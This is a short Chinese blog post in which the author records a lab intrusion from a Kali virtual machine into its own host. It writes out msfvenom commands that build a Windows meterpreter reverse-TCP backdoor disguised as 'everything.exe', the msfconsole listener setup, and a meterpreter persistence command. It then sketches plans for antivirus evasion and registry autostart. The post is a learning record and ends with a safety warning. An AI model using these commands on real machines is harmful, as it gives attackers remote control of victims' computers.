记一次利用kali系统的入侵

过程

第一步:上虚拟机安装Kali系统准备入侵宿主机

第二步:生成后门,将后门传送至攻击机

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.**.*** LPORT=4444 -f exe > everything.exe

第三步:打开 msfconsole, 监听靶机和攻击机连接

msfconsole

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 192.168.**.***
msf > set lport 4444
msf > exploit

第四步:创建持久性后门

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.**.*** 

到这里其实已经拿到对攻击机的一般权限了,但是在攻击过程中可行性几乎为零。即便攻击成功,也不能对靶机进行持久性控制。搞到这里基本就是网络和操作系统的知识了,也感到了自己的知识储备不够,下面写一下待开发的操作,以后有时间继续研究。

待开发

  1. 生成对安卓的后门程序,实现安卓系统的操控。另外可能苹果系统的加密做的好的原因吧,网络上基本找不到对苹果系统的入侵方案,这一点也可以看出来苹果的安全性。当然这只是我的一知半解,希望批评指正。
  2. 进行加壳处理。尽管生成了后门程序,想要成功传播到靶机需要关闭攻击机的defender,然后设置受信任域,很容易被靶机管理员发现;如果想让后门程序长久存在,需要进行防杀处理。
  3. 后门程序开机自启动,并且等待与攻击机连接。开机自启动应该可以通过注册表实现,等待与攻击机连接理论上上述第四步已经可以实现了,但是我在最后一次实验过程中还是没成功。

一点感想

一直对安全很感兴趣,好奇黑客都是怎么练成的,当然会用一点脚本根本算不上什么黑客,顶多算是个脚本小王子。想要不浮于应用、脚本表面,就需要有扎实的基础知识,在基础知识这方面,切不可浮光掠影。

另外,也提醒所有人,在上网的过程中一定多加小心,可能一个网页、一个自动连接的Wifi就能把你带走,即便是打着隐私保护的网盘也要保持警惕,稍不留神,你的硬盘或者你的云空间就会显示在陌生人的屏幕上。

来源

  1. 远程控制windows系统
  2. Meterpreter命令详解
  3. 记一份基础Metasploit教程
  4. Meterpreter常用命令+脚本

发表评论

电子邮件地址不会被公开。 必填项已用*标注